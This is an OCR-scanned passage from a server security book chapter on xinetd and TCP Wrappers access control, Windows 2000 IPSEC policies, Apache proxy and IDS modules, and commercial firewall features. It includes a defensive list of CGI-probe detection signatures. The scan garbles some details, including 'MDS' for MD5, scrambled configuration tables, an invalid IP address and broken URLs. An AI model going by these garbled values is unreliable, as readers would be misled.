when you can’t use a firewall but still need network access control. 


For example, suppose you have a sacrificial Web host and you want to block every- 
thing but HTTP traffic. You can do that, but still cut a hole for SSH connections on 
port 22 so that your Web developers can upload files, change permissions, configure 
CGI scripts, and so on. For these tasks, TCP Wrappers is more than sufficient, and 
saves you money on firewall licenses (which frequently attach on a per-machine or 
per-processors basis). 


NOTE 





Note that TCP Wrappers cannot block HTTP or SSH traffic, conditionally or otherwise. To 
perform these functions, you must either a) set these options in xinetd, or b) set your rules for 
HTTP and SSH individually, in their respective configuration files (httpd.conf and 
ssh2d_config, respectively). 


xinetd 


Newer Unix distributions also sometimes use xinetd, or the eXtended InterNET 
services daemon. xinetd is a secure replacement for inetd, and xinetd offers 
advanced features, including 


e DoS prevention 

e Enhanced access control 

e Enhanced logging and log limits 
e IPv6 support 

e Service offloading 


e Time-based limits 
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As described in xinetd’s documentation: 


xinetd performs the same function as inetd: It starts programs that provide Internet services. 
Instead of having such servers started at system initialization time, and be dormant until a 
connection request arrives, xinetd is the only daemon process started and it listens on all 
service ports for the services listed in its configuration file. When a request comes in, xinetd 
starts the appropriate server. Because of the way it operates, xinetd (as well as inetd) is also 


referred to as a super-server. 


xinetd installs three components: 
e /usr/sbin/xinetd—The xinetd executable 
e /etc/xinetd.conf—The default xinetd configuration file 


e /etc/xinetd.d The xinetd directory (for config files) 


Table 16.4 lists xinetd’s various startup options. 


TABLE 16.4 xinetd Startup Options 





Option Significance 

-cc [interval] Consistency check—specify the interval (in seconds) by which 
xinetd should check its internal state and assure all is well. 

-d Run in debug mode and provide verbose output. 

-f [configfile] Specify an alternate configuration file (/etc/xinetd.conf is the 
default). 

-filelog [Logfile] Specify a log filename (where xinetd sends its message). 

-limit [proclimit] Limit the number of concurrent processes xinetd can start, and 
therefore block process table overflow attacks. 

-logprocs [limit] Limit the number of concurrent servers for remote user ID 
acquisition. 

-loop [rate] Set the loop rate after xinetd deems a service deactivated or 


disabled. Express the rate in number of servers per second that can 
fork (the default is ten). 


-pidfile [pidfile] Where to store the PID. 

-reuse Set the socket option SO_REUSE-ADDR before binding the socket to 
an Internet address. 

-shutdownprocs [limit] Limit the number of concurrent servers for service shutdown. 

-syslog [syslogfacility] Set the log type and depth. These are syslog values, for example 


daemon, auth, user, local[0-7]. 
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Configuring xinetd Service Control 

xinetd follows inetd’s model of partitioning out access control on a by-service basis, 
but takes it to a sublime degree, and enables you to specify your rules in one of two 
ways: 


e In an integrated file (address all services wholesale) 


e On a file-by-service basis 


A barebones, integrated file looks like this: 


service imap 


{ 
socket_type = stream 
protocol = tcp 
wait = no 
user = root 
only_from = 63.69.110.193 127.0.0.1 
banner = /usr/local/etc/deny_banner 
server = /usr/local/sbin/imapd 
} 
service telnet 
{ 
flags = REUSE 
socket_type = stream 
wait = no 
user = root 
redirect = 192.168.1.7 23 
bind = 127.0.0.1 
log_on_failure += USERID 
} 


Here, you enclose directive blocks in brackets ({ }). Between such brackets, you 
specify your rules. The structure is this: 


service <service_name> 


{ 


<attribute> <assign_op> <value> <value> ... 


} 


Table 16.5 enumerates valid xinetd attributes. 
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TABLE 16.5 xinetd Attributes 


Option 


Significance 





access times 


ATTEMPT 


banner 


banner_fail 


banner_success 


bind 


cps 


DISABLE 


disable 
DURATION 


enabled 


env 


EXIT 


FILE 


flags 


group 


groups 


HOST 


id 
IDONLY 


include 
includedir 


xinetd’s piéce de résistance, this sets the time intervals when specified 
allowed hosts can access the server. The format is hour:min-hour:min. 

A log_on_failure directive, this logs failed attempts. 

Specifies a file containing a message that xinetd will display to incoming 
users. 

Specifies a file containing a message that xinetd will display to incoming 
users. 

Specifies a file containing a success message that xinetd will display to 
incoming users. 

Binds the specified server to a specific interface. 

Limits the rate of incoming connections. Syntax is connections-per-second 
followed by the number of seconds xinetd should wait before re- 
enabling the specified service. 

Flag that specifies that xinetd should disable the specified service 
(doesn’t start it). 

Essentially achieves the same result as DISABLE. 

A log_on_success/log_on_failure directive—this logs a service session’s 
duration. 

Sets the specified service(s) to enabled. 

Sets environment variables (name=value). 

A log_on_success/log_on_failure directive—this logs that a server 
exited and the exit status. 

A log_type, this specifies that xinetd should funnel its logs to a file (and 
not syslog). 

Flags control xinetd’s internal behavior. Valid flags are DISABLE, IDONLY, 
INTERCEPT, NAMEINARGS, NODELAY, NORETRY, and REUSE. To learn their 
significance, see their entries in this table. 

Sets the specified server’s gid (the group must exist in /etc/group). 
Specifies whether the specified server will run with group permission 

or not. 

A log_on_success/log_on_failure directive—this logs the remote host 
address. 

Identifies a service (typically, the service’s name, but you can change this). 
A flag that specifies that xinetd should only accept connections from 
hosts that ID the remote user (for example, systems running ident). 
Careful with this one; you can inadvertently block many folks because few 
people intentionally run ident anymore. 

Specifies a file or files to include for xinetd rule processing. 

Specifies the directory where additional rule files reside. 
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TABLE 16.5 Continued 








Option Significance 

instances Sets how many servers can run concurrently for the specified service. 
(Stops attackers from using tools such as Octopus to open 10,000 
connections to a service.) 

INTERCEPT A flag that specifies that xinetd should intercept packets or accepted 
connections to verify that they come from allowed locations. 

interface See bind. 


log_on_failure 


log_on_success 


log_type 


max_load 


NAME INARGS 


nice 


no_access 


NODELAY 


NORETRY 


only_from 


passenv 
PID 

port 
protocol 


RECORD 


redirect 


Sets xinetd to log failed sessions. Possible values are ATTEMPT, 
DURATION, EXIT, HOST, PID, RECORD, and USERID. Please see their 
respective entries in this table for more information. 

Sets xinetd to log successful sessions. Possible values are DURATION, EXIT, 
HOST, PID, and USERID. Please see their respective entries in this table for 
more information. 

Sets the way xinetd should log events. xinetd allows two logging types: 
SYSLOG and FILE. See their entries in this table for more information. 
Sets a floating-point value as the breaking point after which xinetd will 
stop processing connections. This value depends greatly on your operat- 
ing system. 

Flag that specifies that xinetd will use the first argument in server_args 
as argv[] when executing [the specified server]. 

Sets the server priority. 

Sets which hosts to explicitly block. This supports numeric addresses, 
mixed addresses, factorized addresses, network names, hostnames, and 
partial values (masks) for the same. 

Flag that specifies the specified service is TCP and the NODELAY flag is set; 
then TCP_NODELAY will also be set on the socket (TCP only). 

A flag that specifies that xinetd should avoid retry attempts in case of 
fork failure. 

Sets which host to allow. This supports numeric addresses, mixed 
addresses, factorized addresses, network names, hostnames, and partial 
values (masks) for the same. 

A list of environment variables from xinetd’s environment that xinetd 
will pass to the specified server. 

A log_on_success/log_on_failure directive, this tells xinetd to log the 
server process ID. 

The service's port. 

Specifies the protocol, which must exist in /etc/protocols. 

A log_on_failure directive that records information from the remote 
end (login, shell, exec, finger, terminal type). 

Redirects the specified traffic. The syntax is redirect = (ip address) 
(port). 
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TABLE 16.5 Continued 





Option 


Significance 





REUSE 
rpc_number 
rpc_version 


server 


server_args 
socket_type 


SYSLOG 


type 


user 
USERID 


wait 


A flag that sets the SO_REUSEADDR flag on the service socket. 

Sets the number for an UNLISTED RPC service. 

Sets the RPC version for an RPC service. 

Sets the program to launch for the specified service (that is, the 
executable’s location). 

Sets the arguments to pass to the specified server. 

Specifies the service’s socket type, for example, stream, dgram (data- 
gram), raw, seqpacket (requires reliable, sequential transmission). 

A log_type, this specifies syslog_facility [syslog_level], where 
xinetd sends the output to syslog. Allowable levels are emerg, alert, 
crit, err, warning, notice, info, debug. The default is info. 

One or more values specifying the service type, including RPC, INTERNAL 
(xinetd provides it), or UNLISTED (not a well-known service that would 
appear in /etc/services). 

Sets the specified service’s user ID (who does it run as?) 

A log_on_success/log_on_failure directive, this logs the remote 

user ID. 

Determines if the specified service is single or multithreaded. xinetd 
passes control to single-threaded services but retains control of multi- 
threaded services. 





The previous barebones example was 


service imap 

{ 
socket_type 
protocol 
wait 
user 
only_from 
banner 
server 


service telnet 
{ 
flags 
socket_type 
wait 


stream 

tcp 

no 

root 

63.69.110.193 127.0.0.1 
/usr/local/etc/deny_banner 
/usr/local/sbin/imapd 


REUSE 
stream 
no 
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user = root 

redirect 192.168.1.7 23 
bind = 127.0.0.1 
log_on_failure += USERID 


This specifies that only localhost and mcp.com can access the imap service. You can 
either specify your rules this way (in a running file with all directories therein), or 
you can establish an includedir and house files on a per-service basis in that 
directory. 


Suppose that you want all include files to live in /etc/xinetd.d. To alert xinetd to 
this, insert the following line in /etc/xinetd.conf: 


includedir /etc/xinetd.d 


Then, establish your per-service files in /etc/xinetd.d: 


ls -al /etc/xinetd.d 


-FW-r--r-- 1 root root 376 Jan 24 2000 imap 
-FW-r--r-- 1 root root 416 Jan 24 2000 imaps 
-FW-r--r-- 1 root root 447 Jan 24 2000 ipop2 
-FW-r--r-- 1 root root 468 Jan 23 19:28 ipop3 
-FW-r--r-- 1 root root 355 Jan 26 2001 ipop3~ 
-FW-r--r-- 1 root root 344 Jan 23 2000 linuxconf -web 
-PW-r--r-- 1 root root 432 Jan 24 2000 pop3s 
-PW-r--r-- 1 root root 466 Jan 26 2001 telnet 
-FW-r--r-- 1 root root 452 Jan 29 2001 wu-ftpd 


In each such file, specify your rules: 


# cat /etc/xinetd.d/telnet 
service telnet 


{ 
flags = REUSE 
socket_type = stream 
wait = no 
user = root 
only_from = 63.69.110.193 127.0.0.1 
banner = /usr/local/etc/deny_banner 
bind = 127.0.0.1 


log_on_failure += USERID 
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IP Filtering in Windows 


You can also achieve basic firewall functionality in Microsoft Windows (NT, 2000, 
XP) without purchasing a firewall proper. 


Microsoft’s ISPEC and filtering support into W2K includes 


e Session integrity—The Windows 2000 IPSEC implementation enables W2K 
hosts to maintain session integrity, thus preventing session hijacking. 


e Session privacy—The Windows 2000 IPSEC implementation provides session 
encryption, thus addressing electronic eavesdropping issues. 


e User-level authentication—The Windows 2000 IPSEC implementation enables 
W2K hosts to verify a given user’s identity via her digital signature. 


W2K provides five tools to implement IPSEC and they are IPSEC Polices, MMC IPSEC 
Management, the IPSEC Agent Server, the IPSEC Driver, and the Internet Key 
Exchange. 


To set your general IP security policies for a specific network connection, choose My 
Computer, Control Panel, Network and Dial-up Connections. This will reveal the 
Network and Dial-up Connections applet, which stores your network connections 
(see Figure 16.4). 
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FIGURE 16.4 The Network and Dial-up Connections applet. 


Next, right-click your desired connection and choose Properties. In response, W2K 
will display the connection’s Properties window (see Figure 16.5). 


Here, find the check box labeled Components Checked Are Used by This 
Connection, scroll down to Internet Protocol [TCP/IP], and choose Properties, 
Advanced, Options. In response, W2K will display the Advanced TCP/IP Settings 
window (see Figure 16.6). 
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FIGURE 16.5 The connection’s Properties window. 
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FIGURE 16.6 The Advanced TCP/IP Settings window. 


Here, highlight IP Security, and click Properties. In response, W2K will display the IP 
Security window, which offers several choices: 


e Do Not Use IPSEC—This disables IPSEC for the specified network connection. 


e Use This IPSEC Policy—This enables you to specify a preset IP security policy to 
apply to the specified network connection 


e Selected IP Security Policy Description—This reports the selected IP security 
policy’s description (something that either you or W2K assigns) 
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Preset policies specify one of three behaviors: 


e Client (Respond Only)—This is for low-end, garden-variety connections from 
computers in environments that don’t strictly enforce security. Intranets are 
good examples of such environments. Often, only some users and hosts in 
intranets strictly demand security, and therefore the majority of connection 
requests will be for nonencrypted, nontunneled communication. The Client 
Respond Only settings specify how a host that exists in such a loose environ- 
ment should respond when another host requests secure communications. 


e Server (Request Security)—This setting is the next ramp up from Client 
(Respond Only), and is useful in environments where the majority of hosts 
need or demand secure communication. Here, the server isn’t passive anymore, 
but instead always asks for secured communications. This policy specifies how 
the host conducts this exchange. 


e Secure Server (Require Security)—This setting governs the most restrictive state, 
the state in which your W2K host requires secure communications and rejects 
any connection request that fails to meet the requirements you set forth in this 
policy. 


These general settings let you specify wide, sweeping IPSEC policies for the specified 
connection. However, to enforce more granular and specific policies, you must turn 
to the MMC-based IPSEC Policy snap-in. 


The MMC IPSEC Policy Snap-in 


To start the MMC IPSEC Policy snap-in, choose Start, Run, MMC. In response, W2K 
will display the Microsoft Management Console (see Figure 16.7). 


Next, choose Console, Add/Remove Snap-in, Standalone, Add. In response, W2K will 
display the Add Standalone Snap-in window (see Figure 16.8). 


Here, scroll down to IP Security Policy Management and choose Add, Finish, Close, 
OK. In response, W2K will load the IP Security Policy Management Snap-in to your 
current MMC console. Here, click IP Security Policies on Local Machine in MMC’s 
left pane. In response, W2K will display three options: 


e Client (Respond Only) 
e Server (Request Security) 


e Secure Server (Require Security) 
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FIGURE 16.7 The Microsoft Management Console. 
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FIGURE 16.8 The Add Standalone Snap-in window. 


Here, double-click your desired option. In response, W2K will display that option’s 
Properties window. In this case, we’ll choose Client (Respond Only), shown in 
Figure 16.9. 
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FIGURE 16.9 The Client (Respond Only) Properties window. 


Here, choose Edit. In response, W2K will display the Edit Rule Properties window, 
which offers three tabs: 


e Security Methods 
e Authentication Methods 


e Connection Type 


The Security Methods tab offers an interface through which to edit IPSEC 
Authentication Header integrity and Encapsulating Security Payload integrity/confi- 
dentiality security methods. For integrity, W2K offers two algorithms, which we 
touched on earlier in Chapter 11, “Apache and Authentication: Who Goes There?”: 


e MD5—MDS belongs to a family of one-way hash functions called message 
digest algorithms and was originally defined in RFC 1321. The algorithm 
(MDS) takes as input a message of arbitrary length and produces as output a 
128-bit “fingerprint” or “message digest” of the input. It is conjectured that it 
is computationally infeasible to produce two messages having the same 
message digest, or to produce any message having a given prespecified target 
message digest. The MDS algorithm is intended for digital signature applica- 
tions, where a large file must be “compressed” in a secure manner before being 
encrypted with a private (secret) key under a public-key cryptosystem such 
as RSA. 
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e SHA (The NIST Secure Hash Algorithm)—SHA is exceptionally strong and has 
been used in defense environments. For example, the Department of Defense 
requires all DoD managed systems adhere to the Multilevel Information System 
Security Initiative (MISSI), and use only products cleared by the same. SHA is 
used in one MISSI-cleared product called the Fortezza card, a PCMCIA card that 
provides an extra layer of security to e-mail sent from DoD laptops. (SHA is 
also incorporated into the Secure Data Network System Message Security 
Protocol; a message protocol designed to provide security to the X.400 Message 
Handling environment.) To learn more about SHA, grab Federal Information 
Processing Standards Publication 180-1, located at 
http: //ww.itl.nist.gov/fipspubs/fip180-1.htm. 


SHA is the better choice, because although MDS is formidable, it’s not entirely 
secure. Hans Dobbertin (of the German Information Security Agency) demonstrated 
that MD5 does have weaknesses. In his 1996 paper, “Cryptanalysis of MD5 Compress,” 
Dobbertin described an attack (dubbed “collision of a compress function”) that 
allowed attackers to produce identical MDS hashes for two different messages. 


Dobbertin’s attack is obscure, requires considerable technical skill, and is unlikely in 
dynamic environments (such as session authentication exchanges). However, it does 
prove that you can circumvent MDS. 


Proxy Tools That Work with Apache 


In this section, we’ll look at a few third-party proxy tools designed to work with 
Apache proxying, including 


e mod_fortress 

e mod_ip_forwarding 
e mod_limitipconn 
e mod_rpaf 


e mod_tproxy 


mod_fortress 


mod_fortress, from Interstellar (io@spunge.org) is a GPL firewall-like IDS tool, 
which, as explained in its documentation, 


...relies on analyzing requests sent from the client to the Web server, and logs specific mali- 
cious requests with extensive info about the attacker as well as the attacked server (if multiple 
virtual servers). It also has the capability to act as a nontransparent proxy, thus, 


protecting/obscuring your server via sending false return http error codes. 
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mod_fortress (which supports Apache 1.3.12, on Linux, NetBSD, and OpenBSD) 
provides the following features: 


e Custom logging 
e Detects common CGI/HTTP security requests and scans 


e Detects known Anti-IDS evasive scanning methods (Whisker, twwwscan, 
VoidEye, and so on) 


e Integrated SSL support 


e The capability to act as a nontransparent proxy to modify specific requests 
(such as cgi return error codes) 


mod_fortress logs are clean and easy to read: 


= Source: 65.42.154.230 

= Destination: www.spunge.org 

= Port: 80 

= Request Line: GET /~root/ HTTP/1.0 

= Description: /~root/ Directory Listing Attempt 
= Method: GET 

= Protocol: HTTP/1.0 

= Virtual Host: 192.168.254.500 

= User-Agent: Mozilla/4.77  (Win95; U) 

= Query Arguments: 


= Source: 65.42.154.230 

= Destination: www.spunge.org 

= Port: 80 

= Request Line: GET /logs/ HTTP/1.0 

= Description: /logs/ Directory Listing Attempt 
= Method: GET 

= Protocol: HTTP/1.0 

= Virtual Host: 192.168.254.50 

= User-Agent: Mozilla/4.77  (Win95; U) 

= Query Arguments: 
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mod_fortress relies on various attack signatures, which you load into httpd.conf via 
the <FortressSignatures> directive: 


<IfModule mod_fortress.c> 

# the signatures 

<FortressSignatures> 

/cgi-bin/; /cgi-bin/ Directory Listing attempt [0] 
/cgi-bin/webdist.cgi; Webdist CGI Attempt [404] 
/cgi-bin/handler; Handler CGI Attempt [404] 
/cgi-bin/wrap; Wrap CGI Attempt [404] 
/cgi-bin/pfdisplay.cgi; Pfdisplay CGI Attempt [404] 
/cgi-bin/MachineInfo; MachineInfo CGI Attempt [404] 
/cgi-bin/flexform.cgi; Flexform CGI Attempt [404] 
/cgi-bin/flexform; Flexform CGI Attempt [404] 
/cgi-win/; /cgi-win/ Directory Listing Attempt [404] 
/cgi-bin/day5datacopier.cgi; Day5datacopier CGI Attempt [404] 
/cgi-bin/webutils.pl; Webutils CGI Attempt [404] 
/cgi-bin/tpgnrock; Tpgnrock CGI Attempt [404] 
/Cgi-bin/webwho.pl; Webwho.pl CGI Attempt [404] 
</FortressSignatures> 


Additionally, somewhere in httpd.conf, you specify your desired mod_fortess log 
format and layout: 


FortressLog logs/fortress_ log 
FortressLogString D 


= Source: %Ci & \ 

= Destination: %Sh & \ 

= Port: %Sp & \ 

= Request Line: %Rr & \ 

= Description: %Rd & \ 

= Method: %Rm & \ 

= Protocol: %Rp & \ 

= Virtual Host: %Sv & \ 

= User-Agent: %H[User-Agent] & \ 
= Query Arguments: %Rq & \ 


Table 16.6 summarizes mod_fortress log format directives. 
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TABLE 16.6 mod_fortress Log Directives 








Directive Significance 
%Ch Remote hostname 
%Ci Remote IP 
%C1 Local IP 
%H Headers (%H[User-Agent], %H[Accept], %H[Host]) 
%Rd Request Description 
sRm Request Method 
%Rp Protocol 
%Rq Query arguments 
%Rr Entire request line 
%Ru URI 
%Sa Server admin 
%Sh Server hostname (local hostname) 
%Sn Server name 
%Sp Server port 
%SV Virtual host 
%Td Day 
%Th Hour 
%Tm Minute 
sTM Month 
%TS Second 
%Ty Year 
& Newline 

NOTE 


Get mod_fortress at http://www. spunge.org/~io. 





mod_ip_forwarding 


mod_ip forwarding by Jose Kahan is a customizable module for forwarding IP 
between a proxy (or a chain of proxies) and a main server, in a semisecure way. 


As explained in the documentation, mod_ip_forwarding 


...forwards the IP@ address of a client inside a customizable HTTP header. If the client sends 
such a header, it'll substitute the value of r->connection->remote_ip with the value given in 
the header (only in this ASCII temp buffer). This way, CGI scripts can work with the correct 


IP@ without having to be modified. When received, the header won't be cleared, so that it’s 
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possible to have cascading proxies. The administrator must specify which proxies can forward 
this header. If an untrusted proxy sends such a header, it'll be removed from the headers, and 


an error message will be logged. 


mod_ip_ forwarding supports four directives: 


e AcceptForwardedClientIPAddress—This authorizes accepting an 
X_Client_Address header. 


e AuthorizedProxies—This sets a list of proxies authorized to send an 
X_Client_Address header. 


e ForwardClientIPAddress—This controls sending of the X_Client_Address 
header. 


e X_ClientIPAddrHeader—This sets a customizable header string for sending the 
client IP address. 


NOTE 


Get mod_ip forwarding at http://dev.w3.org/cgi-bin/cvsweb/apache- 
modules/mod_ip_forwarding/. 





mod_limitipconn 

mod_limitipconn from David Jao is an Apache module that limits the maximum 
number of simultaneous connections per IP address. This module enables inclusion 
and exclusion of files based on MIME type. 


As explained in the mod_limitipconn documentation: 


...this module will not function unless mod_status is loaded and the ExtendedStatus On 
directive is set. The limits defined by mod_limitipconn.c apply to all IP addresses connecting 
to your Apache server. Currently, there is no way to set different limits for different IP 
addresses. Connections in excess of the limit result in a stock 403 Forbidden response. The job 


of returning a more useful error message to the client is left as an exercise for the reader. 


Installation is quick and painless. After downloading the package, which requires 
Apache 1.3.22+, unpack it: 


tar xzvf mod_limitipconn-0.03.tar.gz 
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Next, patch 1.3.22: 


cd apache_1.3.22 
patch -p1 < ../mod_limitipconn-0.03/apachesrc. diff 
cp ../mod_limitipconn-0.03/mod_limitipconn.c src/modules/extra/ 


Then, generate the configuration: 


./configure --activate-module=src/modules/ 
sextra/mod_limitipconn.c --with-forward 


And finally, make and install the module: 


make; make install 


mod_limitipconn’s configuration is straightforward: 


<IfModule mod_limitipconn.c> 
<Location /somewhere> 
MaxConnPerIP 3 
# exempting images from the connection limit is often a good 
# idea if your web page has lots of inline images, since these 
# pages often generate a flurry of concurrent image requests 
NoIPLimit image/* 
</Location> 
<Location /mp3> 
MaxConnPerIP 1 
# In this case, all MIME types other than audio/mpeg and video* 
# are exempt from the limit check 
OnlyIPLimit audio/mpeg video 
</Location> 
</IfModule> 


NOTE 


Get mod_limitipconn at http: //dominia.org/djao/limitipconn.html. Also, you can obtain 
a Perl version (Apache: :LimitIPConn) at http: //dominia.org/djao/limitipconn- 
perl.html. 





mod_rpaf 


As described in its documentation, mod_rpaf, the reverse proxy add_forward module 
from Thomas Eibner, is 
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...for backend Apache servers what mod_proxy_add_forward is for frontend Apache servers. It 
does exactly the opposite of mod_proxy_add_forward written by Ask Bjorn Hansen. It changes 
the remote address of the client visible to other Apache modules when two conditions are 
satisfied. First condition is that the remote client is actually a proxy that is defined in 
httpd.conf. Secondly if there is an incoming X-Forwarded-For header and the proxy is in it’s 
list of known proxies it takes the last IP from the incoming X-Forwarded-For header and 
changes the remote address of the client in the request structure. It also takes the incoming 


X-Host header and updates the virtualhost settings accordingly. 


It’s easy to use and supports only two directives: RPAFenable and RPAFproxy_ips. 
RPAFenable’s value must either be on or off, and RPAFproxy_ips takes IP addresses as 
arguments. You use RPAFproxy_ips to identify your frontend proxies by address (so 
that they can send the correct X-Forwarded-For headers): 


RPAFenable On 
RPAFsethostname On 
RPAFproxy_ips 127.0.0.1 10.0.0.1 


NOTE 


mod_rpaf is available for Unix, Windows, and Netware, but requires Apache 1.3.4 or above. 
You can download it at http: //stderr.net/apache/rpaf/. 





mod_tproxy 

mod_tproxy from Steve Kann enables the mod_proxy standard module to handle 
transparent proxy requests. It can make Apache function as a Web server and a proxy 
server simultaneously (and with a single instance) and can also serve as a compiled- 
in module or a DSO. As explained in its documentation, mod_tproxy 


...is designed to be used in conjunction with Linux IP TRANSPARENT PROXY firewalling, or 
any similar system on another operating system. Transparent proxying redirects tcp connec- 
tions destined for a foreign host to a local port. A local server can then accept the connection, 


and act as a proxy. getsockname() will reveal the original destination host. 
Get mod_tproxy at http: //www.stevek.com/projects/mod_tproxy/. 


NOTE 


Note that third-party tools and modules a) may not always work as intended on your plat- 
form; and b) occasionally evidence security vulnerabilities themselves. Hence, carefully watch 
their mailing lists for updates, or if they have no mailing list, check their Web sites. Security 
software, like any software, can sometimes be flawed. 
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Other Apache Proxy Tools 
Finally, Table 16.7 lists a few useful Perl-based proxy tools. 


TABLE 16.7 Other Apache-Related Proxy Tools 


Tool Description and Location 





Apache -DumpHeaders This Perl package, from Bjørn Hansen, watches HTTP transaction via 
headers, and provides a skeleton for a generic proxy system. Get it at 
http: //www.cpan.org/authors/id/ABH/Apache -DumpHeaders - 
@.93.tar.gz. 

Apache -No404Proxy This Perl Apache package exploits Google’s cache. As the author 
explains, “Apache: :No404Proxy serves as a proxy server, which auto- 
matically detects 404 responses and redirects your browser to Google 
cache...This proxy may or may not break terms of service of Google.” 
Either way, it’s an interesting tool. Get it at 
http: //www.cpan.org/authors/id/M/MI/MIYAGAWA/Apache- 
No404Proxy-0.03.tar.gz. 

Apache - Proxy This package from Ilya Obshadko provides a Perl interface to 
mod_proxy. Get it at 
http: //www.cpan.org/authors/id/X/XF/XFIRE/Apache -Proxy - 


@.02.tar.gz. 

Apache -ProxyPass This package from Michael Smith implements ProxyPass in Perl. Get it 
at http: //www.cpan.org/authors/id/MJS/Apache-ProxyPass- 
@.06.tar.gz. 

Apache -ProxyRewrite This package from Christian Gilmore is a mod_per1 URL-rewriting 


proxy. Get it at 
http: //www.cpan.org/authors/id/C/CG/CGILMORE/Apache- 
ProxyRewrite-0.15.tar.gz. 

Apache -ProxyStuff This package from Jason Bodnar is a mod_perl header/footer/proxy 
module. Download it from 
http: //www.cpan.org/authors/id/J/JB/JBODNAR/ Apache - 
ProxyStuff -0.10.tar.gz. 





Commercial Firewalls 


If yours is a commercial enterprise, you'll likely need more than a mere proxy and 
more than a general purpose freebie firewall. This section focuses on several indus- 
trial strength firewalls, listed in Table 16.8. 
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TABLE 16.8 Selected Commercial Packages 


Field 


Details 





Product 

Access Control 
Algorithms 
Authentication 
Auto-Alerts 
Content Filtering 
IP Forwarding 
IPSEC Gateway 
LAN/WAN/DMZ 
Max Users 

Max Connections 
Packet Filtering 
Platforms 

Stateful Inspection 
Warranty 

Web Config 
Product 

Access Control 
Algorithms 
Authentication 
Auto-Alerts 
Content Filtering 
IP Forwarding 
IPSEC Gateway 
LAN/WAN/DMZ 
Max Users 

Max Connections 
Packet Filtering 
Platforms 

Stateful Inspection 
Product 

Access Control 
Algorithms 


Authentication 
Auto-Alerts 
Content Filtering 
IP Forwarding 
IPSEC Gateway 
LAN/WAN/DMZ 


3Com OfficeConnect 

Yes 

DES, TripleDES, ARC-4 

Yes—through the required firewall 

Yes 

Yes 

Yes 

Yes 

Yes 

25, per companion firewall limitations 

25 

Yes 

Platform-independent 

Yes 

3Com Lifetime Limited 

Yes 

Ashley Laurent BroadWay 

Yes 

DES, TripleDES, IDEA, TriplelIDEA, CAST, Blowfish, RC4, and RC5 
X.509, DSS, RSA, IKE, and ISAKMP 

Yes 

Yes 

Yes 

Yes 

Yes 

unspecified 

unspecified 

Yes 

ATMOS, OSE, pSOS, NY, 95, 98, ME, 2000, MacOS 8-9, Linux 
Yes 

Check Point SecureServer 

Yes, through a powerful integrated firewall 
AES (128-to-256-bit) Triple DES (168-bit), DES 56-bit, FWZ-1 48-bit, 
DES-40 (40-bit), and CAST-40 

SecurelD, LDAP, TACACS+, RADIUS, X.509 
Yes, through integrated firewall 

Yes, through integrated firewall 

Yes, through integrated firewall 

Yes, through integrated firewall 

Yes, through integrated firewall 
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Field 


Details 





Max Connections 
Packet Filtering 
Platforms 


Stateful Inspection 
Web Config 
Product 

Access Control 
Algorithms 
Authentication 
Platforms 


Warranty 
Product 
Access Control 
Algorithms 
Authentication 


Auto-Alerts 
Content Filtering 
IP Forwarding 
IPSEC Gateway 
LAN/WAN/DMZ 
Max Users 

Max Connections 
Packet Filtering 
Platforms 

Stateful Inspection 
Warranty 

Web Config 
Product 

Access Control 
Algorithms 
Authentication 


Auto-Alerts 


20,000 concurrent VPN tunnels 

Heavy-duty, through a powerful integrated firewall 

Solaris 7, (32bit), Solaris 8 (32 and 64bit), Red Hat 6.2-7.0, Windows 
2000 Server and Advanced Server 

Yes, through a powerful integrated firewall 

No, but an excellent Visual Policy Editor 

Chrysalis-ITS Luna 

Yes 

DES, TripleDES 

SHA-1, MDS, RSA, Diffie-Hellman, DSA, IKE 

Windows NT 4.0; Solaris 2.5.1, 2.6 & 2.7 (Solaris 7); HP-UX 10.20; 
FreeBSD. 2.2.7 (note that hardware config is relevant: 30, 60 Sun 
Sparc Ultra 5, 10) 

Depends on model 

Cisco 7200 

Yes 

DES and 3DES 

RSA, Diffie Hellman, SHA-1, MDS, wide certificate support (Entrust, 
Verisign, Microsoft, iPlanet, Baltimore Technologies), X.509 digital 
certificates (RSA signatures), shared secrets, Simple Certificate 
Enrollment Protocol, RADIUS, TACACS+, CHAP/PAP (RFC 1994) 
Yes 

Yes 

Yes 

Yes 

Yes 

See Max Connections 

1500 tunnels, upgradeable to 5,000 

Yes 

Hardware-based 

Yes 

Depends on config 

Cisco Secure Policy Manager, VPN Manager 

Cocentric XO 

Yes 

DES, TripleDES 

Yes—but unclear from documentation, contact vendor for more infor- 
mation 

Yes—but unclear from documentation; contact vendor for more infor- 
mation (managed services, too) 
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TABLE 16.8 Continued 





Field 


Details 





Content Filtering 


IP Forwarding 
IPSEC Gateway 
LAN/WAN/DMZ 
Packet Filtering 
Platforms 
Stateful Inspection 
Warranty 
Product 
Access Control 
Algorithms 
Authentication 


Auto-Alerts 
Content Filtering 
IP Forwarding 
IPSEC Gateway 
LAN/WAN/DMZ 
Max Users 

Max Connections 
Packet Filtering 
Platforms 

Stateful Inspection 
Warranty 

Web Config 
Product 

Access Control 
Algorithms 
Authentication 


Auto-Alerts 
Content Filtering 
IP Forwarding 
IPSEC Gateway 
LAN/WAN/DMZ 
Packet Filtering 


Yes—but unclear from documentation; contact vendor for more infor- 
mation 

Yes 

Yes 

Yes 

Yes 

Hardware-specific (integrates with Cisco) 

Yes 

Depends on options; see VPN bundle specs 

Cylink NetHawk 

Yes 

DES, FIPS 46-2 (56-bit keys), Standard CBC, Triple-DES 

PKCS 10, Diffie-Hellman, X.509 v3, CRL, IKE Features, Pre-shared keys, 
DSS authentication (128 bytes), RSA (1024 bits), NIST FIPS PUB 186, 
Quick/Main/Aggressive modes, HMAC-MD5, HMAC-SHA-1, 
DES-MAC 

Yes 

Yes 

Yes 

Yes 

Yes 

See Max Connections 

20,000 

Yes 

Microsoft Windows NT, Sun Solaris 

Yes 

Depends on config 

GUI client 

Data Fellows F-Secure 

Yes 

DES, 3-DES, CAST, Blowfish 

Certificate-based with RSA signatures, shared secrets, IKE-XAUTH 
secured, RADIUS, HMAC-MD5, HMAC-SHA-1, IKE (Main/Aggressive), 
Diffie-Hellman 

Yes 

Yes 

Yes 

Yes 

Yes 

Yes 
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Field 


Details 





Platforms 


Stateful Inspection 
Web Config 
Product 

Access Control 
Algorithms 
Authentication 
Auto-Alerts 
Content Filtering 
IP Forwarding 
IPSEC Gateway 
LAN/WAN/DMZ 
Max Users 

Max. Connections 
Packet Filtering 
Platforms 

Stateful Inspection 
Warranty 

Web Config 
Product 

Access Control 


Algorithms 


Authentication 


Auto-Alerts 
Content Filtering 
IP Forwarding 
IPSEC Gateway 
LAN/WAN/DMZ 
Packet Filtering 


Platforms 
Stateful Inspection 


Windows NT 4.0, WQindows 95, Windows 98, Windows 2000, Solaris 
